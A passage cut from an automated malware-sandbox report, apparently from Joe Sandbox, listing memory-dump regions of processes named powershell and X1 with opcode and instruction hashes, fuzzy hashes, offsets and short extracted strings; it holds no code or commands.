                                                                                • Instruction Fuzzy Hash: DC11CE7290E7C14FE7179778585A0E8BFB0EF1B660B1900FBD088DB0A3E91D584AC326
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca27cbec8f5cc72cd7a12bea8701731134007f408af0c4717c052c6406f4b2f2
                                                                                • Instruction ID: 28d844ba93ae9806bffff29f32c270164a48a96d3509c1337b480402354486e4
                                                                                • Opcode Fuzzy Hash: ca27cbec8f5cc72cd7a12bea8701731134007f408af0c4717c052c6406f4b2f2
                                                                                • Instruction Fuzzy Hash: E2F0F63691DA8C8FD746EF2CE8650E47FA0FF66252B0502EBD448C71A2DF229858C7C1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                • API String ID: 0-962139525
                                                                                • Opcode ID: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                                                                • Instruction ID: 7fd3566e5afb083c6e6401c0847751e720ad71e5f9896b647dd2248b4652e339
                                                                                • Opcode Fuzzy Hash: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                                                                • Instruction Fuzzy Hash: FD21D473A29525DAD242366CB8419DD7790EF543B978603F3E028CF193EE1CA48B8A95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B"I$(B"I$(B"I$(B"I$(B"I$X7c3
                                                                                • API String ID: 0-1448240716
                                                                                • Opcode ID: ac63df185c95355e4efa33424f16d4c633c3e83d917c0af14a50f630e7692fa1
                                                                                • Instruction ID: 05e8e5761e4a549dc64260c6552d5b6670424776a223ae65e348ed61021427f5
                                                                                • Opcode Fuzzy Hash: ac63df185c95355e4efa33424f16d4c633c3e83d917c0af14a50f630e7692fa1
                                                                                • Instruction Fuzzy Hash: 5CD14131D1EA8E5FE795EB2858545B9BBE0EF16394F1801FAD04DCB0D3EA1CA805C356
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>"I
                                                                                • API String ID: 0-2459728092
                                                                                • Opcode ID: 7c384430dd1ff86df7532ad646dbb4606ee50626cb8d0c714fb231fe764b500f
                                                                                • Instruction ID: 99553a4fca475977e0930b3697d7a34d53fa005277275f1497b0145f16239e8b
                                                                                • Opcode Fuzzy Hash: 7c384430dd1ff86df7532ad646dbb4606ee50626cb8d0c714fb231fe764b500f
                                                                                • Instruction Fuzzy Hash: F551B332A0DE8A4FEB9AEB2C941167577D2EFA5660F5801BEC14EC71D3DF1CE8058249
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>"I
                                                                                • API String ID: 0-3426486286
                                                                                • Opcode ID: a5ef57388118ef6cfa84284219311b577c695e17536815f8b0235439975d268f
                                                                                • Instruction ID: 9918a36baaef5957583adc941654c71c78a907acbdb4b6ebe8dc5669fa5be49e
                                                                                • Opcode Fuzzy Hash: a5ef57388118ef6cfa84284219311b577c695e17536815f8b0235439975d268f
                                                                                • Instruction Fuzzy Hash: AD41F432E0DE894FE7A9EB2864106B877E1EF55660F4801BEC449C71C7EB1CAC158395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>"I
                                                                                • API String ID: 0-2459728092
                                                                                • Opcode ID: 46e32ee8136e8793d9535e6feea16ff5393ddbcad028dc1a0ea8f94b6a7840a4
                                                                                • Instruction ID: eb9ef0a161bc5c49652d3c860667b76a9ab3622c45b6835a88db68cf0c6932ec
                                                                                • Opcode Fuzzy Hash: 46e32ee8136e8793d9535e6feea16ff5393ddbcad028dc1a0ea8f94b6a7840a4
                                                                                • Instruction Fuzzy Hash: 73218F32D0EE864FEBA6EB18545517466D2FF64294F5901BEC11DC71D3CF1CDC058249
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2445697878.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848fe0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>"I
                                                                                • API String ID: 0-3426486286
                                                                                • Opcode ID: 191b1e8714d169a833e5df18dff0779307a91dd6c7637722e1bf568332458a28
                                                                                • Instruction ID: f637192066c670f43070331b21fc7b91e91f00480133b7e993fd66e30ee6c76b
                                                                                • Opcode Fuzzy Hash: 191b1e8714d169a833e5df18dff0779307a91dd6c7637722e1bf568332458a28
                                                                                • Instruction Fuzzy Hash: 7D119E32E0EA8A4FE7A5EB2894545B87AD1FF60660F5800BAC41DCB1D3DB1CAC149395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d34d2988f6854f27e948636ef9c1bab066e0fd59ca2d0a681536c3c1eb564fb
                                                                                • Instruction ID: c63defdb119c7c364fb0798572521051f1a41caa8df363e273f99ab2f0691bd9
                                                                                • Opcode Fuzzy Hash: 4d34d2988f6854f27e948636ef9c1bab066e0fd59ca2d0a681536c3c1eb564fb
                                                                                • Instruction Fuzzy Hash: 5A714D37D0D9925FE316BB7CA8660E57B60EF117A9F4801B6C09C8E0D3EE181C568799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbcf3bf95ba566a4f5bbe606d295ea8fb8af5bf4350417044d6fb0a94e15c424
                                                                                • Instruction ID: de9dda4eeb7d8fff6f9cb103e4e55e4fc2b2dc73bbfac167070c5b62bfeabe4a
                                                                                • Opcode Fuzzy Hash: dbcf3bf95ba566a4f5bbe606d295ea8fb8af5bf4350417044d6fb0a94e15c424
                                                                                • Instruction Fuzzy Hash: F331F83191CB489FDB1C9F1CA8066A97BE1FBA5711F00412FE449D3692DB60A856CBC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2443638524.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848dfd000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 32c779eac662ce6be38003ae87ecc09bb2774e51ef9222628173850314933858
                                                                                • Instruction ID: 57a8e5a2b02fd14df12e288b42acc458f591d4301662ec5fe30b1e35c9431e25
                                                                                • Opcode Fuzzy Hash: 32c779eac662ce6be38003ae87ecc09bb2774e51ef9222628173850314933858
                                                                                • Instruction Fuzzy Hash: D141137080EBC44FE7569B289855A523FF0EF56320F1506DFD088CB1A3D729E84AC792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f50cdfa81bb86f92cad112473d25b536e638eaa79c972dd5183042acda5c4e1b
                                                                                • Instruction ID: 026956b3fa943b1742c4d2de1ea7c15f758817de70ad0c0731e0dd3a8b288909
                                                                                • Opcode Fuzzy Hash: f50cdfa81bb86f92cad112473d25b536e638eaa79c972dd5183042acda5c4e1b
                                                                                • Instruction Fuzzy Hash: 37212B3090CB4C8FDB59DF6C984A7E97FF0EB96321F04426BD048C3152DA749856C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2444718019.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7ff848f10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                • API String ID: 0-3508309026
                                                                                • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                                • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CAL_^$SAL_^
                                                                                • API String ID: 0-3741013414
                                                                                • Opcode ID: ab7a83957f84b3ccc4195cf242657a65709076993e5bdd469479ca9590b2e00a
                                                                                • Instruction ID: 368ffb1a37e232dc9550fb4ff432d633fb3aadea966ed1c65eaf6d94cf5fa0b8
                                                                                • Opcode Fuzzy Hash: ab7a83957f84b3ccc4195cf242657a65709076993e5bdd469479ca9590b2e00a
                                                                                • Instruction Fuzzy Hash: 3132BE30B2DA199FE784FB2884597B976E2FF98744F504579E40EC32C2DF2CA9818745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a849248130be18498774c703f0168e87fa743ba5e6990a6f5376f92a04e85c1
                                                                                • Instruction ID: c2db4d7d85ee468f51557a510dd0c1734347d4e066876cacd1bebe51d1ef7424
                                                                                • Opcode Fuzzy Hash: 3a849248130be18498774c703f0168e87fa743ba5e6990a6f5376f92a04e85c1
                                                                                • Instruction Fuzzy Hash: FD912631A0DA9A0FE396BB3C98561F97BE1EF96250F0800BBC449D71E3DE1C68468355
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06e6ad7e2d758a7b9c7ba71086ec7e21f2a161f6823efe48cad76ac58154d535
                                                                                • Instruction ID: bab8d1071a12d1375b530885313e1ce0efd3cd6440c6f2d03296342d42eb957c
                                                                                • Opcode Fuzzy Hash: 06e6ad7e2d758a7b9c7ba71086ec7e21f2a161f6823efe48cad76ac58154d535
                                                                                • Instruction Fuzzy Hash: 1541B232D0EA9A5FE741BB6C98660EE7FB0EF95251F0401B7C449D71E3DE2C284A8354
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 24a28eac8c962568f7cead828ca06ceb69cd4422502b7614a8e0f8c6d3026ce9
                                                                                • Instruction ID: 1c92d0465d29f44f9f98dd7769d8a630f877346d74585c5b1b2ea08186a0cd01
                                                                                • Opcode Fuzzy Hash: 24a28eac8c962568f7cead828ca06ceb69cd4422502b7614a8e0f8c6d3026ce9
                                                                                • Instruction Fuzzy Hash: 4031BE32D0C99A9FE745BB6888661FE7FB1FF95650F4401B7C40AE72E3DE2829468350
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ac940ee4a09a16485279c76c05badc1493c0d622cdcb48884a0ff6f803b2f48b
                                                                                • Instruction ID: 587e27ca201f543977b9723e5305bc2a92ab1f6c85b263e809bfe6b0854ca1c5
                                                                                • Opcode Fuzzy Hash: ac940ee4a09a16485279c76c05badc1493c0d622cdcb48884a0ff6f803b2f48b
                                                                                • Instruction Fuzzy Hash: 2861353191F15A9FE380B76CA4A52EA3FB0EF81358F5481BAE14D8B2C7CE1C25458799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7502a6021af55aacb1c5569c56d0f58484ae15f7a441a53d8e6a9a85559d353e
                                                                                • Instruction ID: 64482f305633e75f5b8f6bae7ca7b2e8a52841a5e22b5d6791bf9c1cf8276283
                                                                                • Opcode Fuzzy Hash: 7502a6021af55aacb1c5569c56d0f58484ae15f7a441a53d8e6a9a85559d353e
                                                                                • Instruction Fuzzy Hash: 75512631A1F15A9FD381F72C94A56EA3FB0FF81258F5481BAE149C72C7CE1C2A448799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ce0744cb199302980cb1855e14a5fed150aaea2452faae4e775803af512617a0
                                                                                • Instruction ID: 053c4de02d79cb5c8a59f43d54908be1ff2515655f74c5f7955c95bc1c098980
                                                                                • Opcode Fuzzy Hash: ce0744cb199302980cb1855e14a5fed150aaea2452faae4e775803af512617a0
                                                                                • Instruction Fuzzy Hash: EA317E30E1AA0A9FDB84FB6884596FE7BB1FF98341F504579D00AD3286DE3CA9418B50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b872409ca5d1db2dddb17e572d16e9ae0111d934eae92cfe7e78d861fbdfc2e
                                                                                • Instruction ID: 3abb5bd9bea77d05b20f7368f0e0fa5c5006f3b97bdebcd5779e2ed6a5c56715
                                                                                • Opcode Fuzzy Hash: 6b872409ca5d1db2dddb17e572d16e9ae0111d934eae92cfe7e78d861fbdfc2e
                                                                                • Instruction Fuzzy Hash: 76218C30B2DA494FE788EF2C945A378B2D2EF98356F4505BEE00EC3293CE689C418745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93a08465391122d224fa2e1b871f3869dfbc07be7230a46afb8646b8b33dd262
                                                                                • Instruction ID: 0616fefc12858eddb823f0068592174d54d7f69c8c719350397187ee462cb507
                                                                                • Opcode Fuzzy Hash: 93a08465391122d224fa2e1b871f3869dfbc07be7230a46afb8646b8b33dd262
                                                                                • Instruction Fuzzy Hash: BA216220B2A90A9BFB84BBBC545A3BD62D2FF98745F50013AE40DD32D2DE2C68424795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 915d344cec61412460d0fe7a7aee7a6696f9b77903c5cb11906a7ffe4eccd437
                                                                                • Instruction ID: 2fe9fe383005a14d71b6eb5a9c36ad3644fc3253026de91cbc69000970e8042b
                                                                                • Opcode Fuzzy Hash: 915d344cec61412460d0fe7a7aee7a6696f9b77903c5cb11906a7ffe4eccd437
                                                                                • Instruction Fuzzy Hash: 2C01C630D1C6880FF381B33808550723FE0DFE8A90F0800BBE88AD30E7CE28AA458346
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: SAP_^
                                                                                • API String ID: 0-3471593181
                                                                                • Opcode ID: e36d2c38e229fb375d8f5c944e5246ee30aceb6c6e556b56970e24b783ef7952
                                                                                • Instruction ID: 43a307960c893491c112d05af127ac5f57678ce970f1c188fd38d03fdeea0490
                                                                                • Opcode Fuzzy Hash: e36d2c38e229fb375d8f5c944e5246ee30aceb6c6e556b56970e24b783ef7952
                                                                                • Instruction Fuzzy Hash: 26715E71A199195FEB95BB78946D7BD7BB2FF99340F800478E40EC33C2EE2869018754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 25bf551476a29e9951acaba138e5054e39c6a7ebd98be1c9d86c1f194451e249
                                                                                • Instruction ID: 97e29b7eeaa0c155bca6b6c0afad35abe3bcf9e00b85ebaf54ec3e2c5f59ea7d
                                                                                • Opcode Fuzzy Hash: 25bf551476a29e9951acaba138e5054e39c6a7ebd98be1c9d86c1f194451e249
                                                                                • Instruction Fuzzy Hash: ED913831E0EA8A1FE756BB3C98551B97FE1EF86254F0900BBD448C72D3EE186C468365
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a8bc59e5549ae14e4f06e3d2e0f4794bde294619fc14ef1737c376eb74033fc6
                                                                                • Instruction ID: 9e43c83ccbfee9e3197705fbd5fd788b3edd587b597ff6bd07ff769573c95218
                                                                                • Opcode Fuzzy Hash: a8bc59e5549ae14e4f06e3d2e0f4794bde294619fc14ef1737c376eb74033fc6
                                                                                • Instruction Fuzzy Hash: 1E41C532E0E68A5FE741BB6898611EE7FB0EF85254F0401B7D048D72D3EE28184A8365
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 53e5c2237ce88b9fbdc395a746e13e63f5364467651e282cbf4ff7a537446abc
                                                                                • Instruction ID: d0c872b7fea87cc7495499b4a06da6505d1b8b84d69a80027f6a237e6383b3cf
                                                                                • Opcode Fuzzy Hash: 53e5c2237ce88b9fbdc395a746e13e63f5364467651e282cbf4ff7a537446abc
                                                                                • Instruction Fuzzy Hash: 1431E132E0D98E5FEB45EB6898651FE7FB0FF86240F4401B6D409D72D3EE2828458361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6cc506b66a9ca39329c0b77fb04a8bcb723a7ab6879b4eecdbab69e75e97fae6
                                                                                • Instruction ID: 7d6ee66c10599c835a20ca412a36b8e830f8f5c446d7d476601914715f3ec75c
                                                                                • Opcode Fuzzy Hash: 6cc506b66a9ca39329c0b77fb04a8bcb723a7ab6879b4eecdbab69e75e97fae6
                                                                                • Instruction Fuzzy Hash: 4261E53290F5969FD381B76CE4A52EA3FB0FF81258F5441BAD048CB393DE1C254587A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: af1040140c9cf99c29ff398442e5fe34a1f9e26490355c28285c00a38a6e2fcc
                                                                                • Instruction ID: f6cdc0362c8c322e82d5f6dfcba5a02f7161ac2b85d2ad924e33fe0fa822b73e
                                                                                • Opcode Fuzzy Hash: af1040140c9cf99c29ff398442e5fe34a1f9e26490355c28285c00a38a6e2fcc
                                                                                • Instruction Fuzzy Hash: 0451E33290E5969FD781F768E4A56EA3FF0FF81254F9441BAD048CB393DE2C29048765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19de3152748bb5d06ff3273983d5793b8e0e46ff08c8397967f9aa51f58e1afd
                                                                                • Instruction ID: ebb3d790812c342c74532bf5919ef4ac7d32b7d58d88ee5e5f3f20b147ec5e40
                                                                                • Opcode Fuzzy Hash: 19de3152748bb5d06ff3273983d5793b8e0e46ff08c8397967f9aa51f58e1afd
                                                                                • Instruction Fuzzy Hash: 82317030E1991A9FEB45FB68D4556BE7BB2FF88344F900579D009D3386DE38A941CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
